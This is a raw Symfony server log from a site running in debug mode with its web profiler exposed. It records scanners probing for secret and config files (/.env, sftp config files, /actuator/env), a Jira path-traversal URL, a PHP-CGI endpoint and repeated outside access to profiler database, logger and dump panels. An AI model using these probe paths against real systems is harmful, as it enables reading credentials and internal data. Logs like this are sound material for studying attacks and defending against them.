  705. [2025-12-16 11:05:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /actuator/env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /actuator/env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  706. [2025-12-16 11:05:30] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /php-cgi/php-cgi.exe"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /php-cgi/php-cgi.exe\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  707. [2025-12-16 11:05:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  708. [2025-12-16 11:05:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.vscode/sftp.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.vscode/sftp.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  709. [2025-12-16 11:05:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /about"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /about\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  710. [2025-12-16 11:05:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /debug/default/view"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /debug/default/view\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  711. [2025-12-16 11:05:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /v2/_catalog"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /v2/_catalog\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  712. [2025-12-16 11:05:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  713. [2025-12-16 11:05:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /server-status"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /server-status\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  714. [2025-12-16 11:05:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login.action"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login.action\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  715. [2025-12-16 11:05:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /_all_dbs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /_all_dbs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  716. [2025-12-16 11:05:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.DS_Store"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.DS_Store\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  717. [2025-12-16 11:05:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  718. [2025-12-16 11:05:46] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /s/4393e20313e2537313e25333/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  719. [2025-12-16 11:05:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  720. [2025-12-16 11:05:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /telescope/requests"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /telescope/requests\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  721. [2025-12-16 11:05:50] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/?rest_route=%2Fwp%2Fv2%2Fusers%2F","method":"GET"} []
  722. [2025-12-16 11:07:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8ae359","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/8ae359?panel=cache","method":"GET"} []
  723. [2025-12-16 11:07:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  724. [2025-12-16 11:08:06] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"836ec4","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/836ec4?group=1&panel=db","method":"GET"} []
  725. [2025-12-16 11:08:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?group=1&panel=db","method":"GET"} []
  726. [2025-12-16 11:12:06] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  727. [2025-12-16 11:12:10] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  728. [2025-12-16 11:12:36] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  729. [2025-12-16 11:18:40] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"819624","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/819624?panel=logger","method":"GET"} []
  730. [2025-12-16 11:18:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
  731. [2025-12-16 11:19:34] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  732. [2025-12-16 11:27:23] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  733. [2025-12-16 11:27:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /feed/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /feed/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  734. [2025-12-16 11:27:25] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/?feed=rss2","method":"GET"} []
  735. [2025-12-16 11:28:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=45.58.159.9&limit=10&method=GET","method":"GET"} []
  736. [2025-12-16 11:28:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=45.58.159.9&limit=10&method=GET","method":"GET"} []
  737. [2025-12-16 11:32:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1513f9","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1513f9?panel=exception","method":"GET"} []
  738. [2025-12-16 11:32:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  739. [2025-12-16 11:39:43] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"569911","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/569911/search/results?ip=189.172.97.42&limit=10&method=GET","method":"GET"} []
  740. [2025-12-16 11:39:43] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.97.42&limit=10&method=GET","method":"GET"} []
  741. [2025-12-16 11:48:53] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  742. [2025-12-16 11:51:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sftp-config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sftp-config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  743. [2025-12-16 11:51:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.vscode/sftp.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.vscode/sftp.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  744. [2025-12-16 11:58:19] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7478c3","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7478c3?panel=cache","method":"GET"} []
  745. [2025-12-16 11:58:19] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  746. [2025-12-16 11:58:27] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fb19b2","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/fb19b2?panel=exception","method":"GET"} []
  747. [2025-12-16 11:58:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  748. [2025-12-16 12:02:30] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
  749. [2025-12-16 12:02:30] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  750. [2025-12-16 12:02:30] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  751. [2025-12-16 12:02:30] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  752. [2025-12-16 12:02:30] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  753. [2025-12-16 12:02:30] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  754. [2025-12-16 12:02:30] security.DEBUG: Calling Authentication entry point. [] []
  755. [2025-12-16 12:18:08] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  756. [2025-12-16 12:19:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  757. [2025-12-16 12:24:58] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"006dcb","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/006dcb?panel=router","method":"GET"} []
  758. [2025-12-16 12:24:58] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
  759. [2025-12-16 12:26:23] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  760. [2025-12-16 12:26:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webui/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webui/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  761. [2025-12-16 12:27:49] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2515c0","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/2515c0?panel=time","method":"GET"} []
  762. [2025-12-16 12:27:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  763. [2025-12-16 12:38:42] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
  764. [2025-12-16 12:38:42] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  765. [2025-12-16 12:38:42] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  766. [2025-12-16 12:38:42] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  767. [2025-12-16 12:38:42] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  768. [2025-12-16 12:38:42] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  769. [2025-12-16 12:38:42] security.DEBUG: Calling Authentication entry point. [] []
  770. [2025-12-16 12:38:42] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
  771. [2025-12-16 12:41:03] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=212.47.64.207&limit=10","method":"GET"} []
  772. [2025-12-16 12:41:03] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=212.47.64.207&limit=10","method":"GET"} []
  773. [2025-12-16 12:45:32] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"e648d1","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/e648d1/search/results?limit=10&method=GET","method":"GET"} []
  774. [2025-12-16 12:45:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
  775. [2025-12-16 12:49:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"ed5b89","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/ed5b89?panel=dump","method":"GET"} []
  776. [2025-12-16 12:49:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
  777. [2025-12-16 12:56:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=146.19.24.116&limit=10&method=GET","method":"GET"} []
  778. [2025-12-16 12:56:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=146.19.24.116&limit=10&method=GET","method":"GET"} []
  779. [2025-12-16 13:06:47] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"bb3b91","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/bb3b91?panel=db","method":"GET"} []
  780. [2025-12-16 13:06:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  781. [2025-12-16 13:11:21] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"565723","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/565723?panel=form","method":"GET"} []
  782. [2025-12-16 13:11:21] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
  783. [2025-12-16 13:17:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"035777","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/035777","method":"GET"} []
  784. [2025-12-16 13:17:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  785. [2025-12-16 13:18:57] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5b05f3","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/5b05f3","method":"GET"} []
  786. [2025-12-16 13:18:57] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
